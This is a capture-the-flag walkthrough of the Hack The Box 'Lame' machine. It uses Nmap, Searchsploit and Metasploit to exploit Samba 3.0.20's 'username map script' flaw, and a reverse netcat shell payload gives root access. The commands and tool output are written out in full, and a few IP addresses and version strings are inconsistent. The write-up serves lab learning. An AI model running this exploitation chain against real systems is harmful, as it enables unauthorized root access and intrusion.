This is far and away one of the easiest HTB boxes to complete. All you need is a copy of Nmap and Metasploit, both of which come with Kali Linux.
Start with an Nmap scan:
nmap -sSV -p0- -A 10.10.10.3
Breaking down the command arguments:
-sS – TCP SYN Stealth ScanV – Print service versions where possible-p0- – Scan all ports from 0 to 65535-A – Run all safe scripts
The Nmap command should output the following:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-09 22:42 GMT
Nmap scan report for 10.10.10.3
Host is up (0.024s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.24
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h36m16s, deviation: 3h32m10s, median: 6m14s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-02-09T17:50:41-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 23.71 ms 10.10.14.1
2 27.17 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.23 seconds
So there are a few things that are notable:
- The FTP server allows anonymous access. That means if I run a command such as
ftp 10.10.10.3 and login as anonymous with no password, I have access to the FTP server, but the FTP server is empty. Not much can be done with this yet. Moving on.
- The FTP server is noted as
vsftpd 2.3.4 and the SMB server is noted as 3.0.20-Debian
Write these down somewhere, as chances are, we will need them later.
Our next step is to search for exploits. We will do this using a tool called ‘Searchsploit’, built into Kali Linux. First, lets search for vsftpd version 2.3.4:
searchsploit vsftpd 3.2.1
This should return the following:
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
This tells us that an exploit exists for this service and version, but said exploit code only works with Metasploit – it won’t work with a standard Ruby interpreter like the .rb extension might suggest.
Let’s access Metasploit by launching msfconsole in terminal. You will be greeted by a new prompt that takes a very different set of commands. Commands to be entered into this new terminal will marked out with msf > at the beginning. Lets start by finding our exploit:
msf > search vsftpd
This should return a single entry with the line ‘exploit/unix/ftp/vsftpd_234_backdoor’, which sounds very much like our exploit mentioned in Searchsploit! To use the exploit, we type in the following command:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
Success! we have loaded the exploit! Now to configure it as needed, we need to know what options there are to configure. Type in:
msf > options
You should see the following:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
Reading through this, we need to set the remote host, or RHOSTS value. We give this the IP of our target like so:
msf > set RHOSTS 10.10.10.3
And with that out of the way, we run the exploit:
msf > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Hmmm. Not quite what we were looking for there. It would appear that this service isn’t vulnerable after all. What do we do now? Maybe there is something in our notes that we haven’t fully covered yet?
Aha! There is another service we can potentially try! Let’s search it in Searchsploit!
> searchsploit samba 3.0.20
---------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------------------------------------------------------- ---------------------------------
That second exploit looks promising, and it’s another Metasploit one.
> msfconsole
msf > search samba username
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
That looks like our exploit! let’s load it in and see what options we need to fill out
msf > use exploit/multi/samba/usermap_script
msf > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
This time we have a bit more to fill out. Because the payload for this exploit is a reverse shell (meaning: the server is phoning home to us to give us control, rather than us going to the server), we need to tell the payload who to contact. The variable for this is LHOST. It may be filled out automatically, but that does not necessarily mean the value is correct. To derive the correct value, execute ip addr and find the IP address for the interface tun0. Fill out both the LHOST and RHOSTS variables as appropriate and run the exploit.
msf > set LHOST 10.10.14.32
msf > set RHOSTS 10.10.10.3
msf > run
[*] Started reverse TCP handler on 10.10.14.30:4444
[*] Command shell session 1 opened (10.10.14.30:4444 -> 10.10.10.3:40999) at 2021-02-12 00:36:24 +0000
It may look like nothing is happening, however, if you try to run the command whoami right now, you’ll get the response of root. This means that you are logged into the remote machine as the root user and can go after the flags in /root/root.txt and /home/makis/user.txt. Use the cat command to read the contents of the file.
Congratulations! You’ve passed your first HTB CTF. Unfortunately it was also the easiest one, and others will get a lot more in-depth. It’s all part of the learning process though, and we will be building our understanding of computer security as we go.
